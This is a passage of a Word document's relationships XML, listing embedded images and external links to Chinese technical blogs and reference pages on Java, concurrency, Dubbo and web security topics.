Target="https://www.baidu.com/s?wd=DDOS%E6%94%BB%E5%87%BB&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9nWF9nWRdmhF9rj-WnjP90ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1fdPjmknHR3nWT4rjmzrjTvPf" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.jpeg"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boy00fly.iteye.com/blog/1139845" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tuicool.com/articles/zIVvyub" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/32726.htm" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/261041.htm" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%AD%BB%E9%94%81&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jb51.net/article/48379.htm" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/heyutao007/article/details/6206153" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.51testing.com/batch.download.php?aid=42462" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jb51.net/article/48301.htm" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/String_interning" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpeg"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.zhihu.com/question/35268028" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/sunzhenchao/p/3161093.html" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/subview/18536/18536.htm" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://swiftlet.net/archives/1268" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cailin.iteye.com/blog/2014486/" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dubbo.io/Developer+Guide-zh.htm" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://weixiaolu.iteye.com/blog/1477774" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/675642.htm" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%AD%BB%E9%94%81&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/os/" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/heyutao007/article/details/6206153" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.jpeg"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpeg"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/liou825/article/details/19307051" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://segmentfault.com/a/1190000000382965" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/sunzhenchao/archive/2013/04/09/3009431.html" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/kangojian/article/details/8056701" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.jpeg"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.jpeg"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dubbo.io/Developer+Guide-zh.htm" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://irfen.me/java-basic-data-type-space/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.importnew.com/2009.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E4%B8%8A%E4%B8%8B%E6%96%87%E5%88%87%E6%8D%A2&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9PHF-mhRzP199ryc3mHnz0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1n4nWnLnHcsPj63njf1nH03Pf" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/6501899.htm" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E7%BA%BF%E7%A8%8B&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.jpeg"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/subview/440795/440795.htm" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.51testing.com/batch.download.php?aid=42463" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://my.oschina.net/shipley/blog/520062" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/wuxianglong/article/details/6612282" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/longeremmy/article/details/8231184" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:linkredwin('%E6%81%B6%E6%84%8F%E6%94%BB%E5%87%BB');" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/hyddd/articles/1391737.html" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.jpeg"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://h.hiphotos.baidu.com/zhidao/pic/item/42a98226cffc1e170597d7af4e90f603738de900.jpg" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stackoverflow.com/questions/10707352/interview-merging-two-sorted-singly-linked-list" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E4%BC%91%E7%9C%A0%E7%8A%B6%E6%80%81&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpeg"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/vking_wang/article/details/14166593" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/tonytfjing/article/details/47212291" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/longeremmy/article/details/8231184" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/88806.htm" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.open-open.com/lib/view/open1363572227609.html" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hudong.com/wiki/%E6%B5%8F%E8%A7%88" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpeg"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.playhack.net/view.php?id=31" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/Javame/p/3632473.html" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sunjun041640.blog.163.com/blog/static/25626832201032911332857/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.gif"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E4%BC%91%E7%9C%A0%E7%8A%B6%E6%80%81&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/tayanxunhua/article/details/20525251" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpeg"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/zhengsj/article/details/4462244" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/longeremmy/article/details/8231184" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/corson/admin/123" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/390474.htm" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.gif"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%96%87%E6%A1%A3%E5%AF%B9%E8%B1%A1%E6%A8%A1%E5%9E%8B&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1dbnyRsPAPhuAfLmH--rHD30ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1f1n1m3rj6zPWf4nWbkn1RzP0" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shiflett.org/articles/cross-site-request-forgeries" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.alibabatech.com/wiki/display/dubbo/User+Guide" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/414610.htm" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://a.hiphotos.baidu.com/zhidao/pic/item/1c950a7b02087bf4bacc0d77f6d3572c11dfcf08.jpg" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.gif"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itindex.net/detail/49353-dubbo" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.jpeg"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ibm.com/developerworks/java/library/j-jtp08223/" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/zhangjg_blog/article/details/21487287" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.itechol.com/space-33-do-blog-id-6146.html" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/dolphin0520/p/3811445.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/longeremmy/article/details/8231184" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 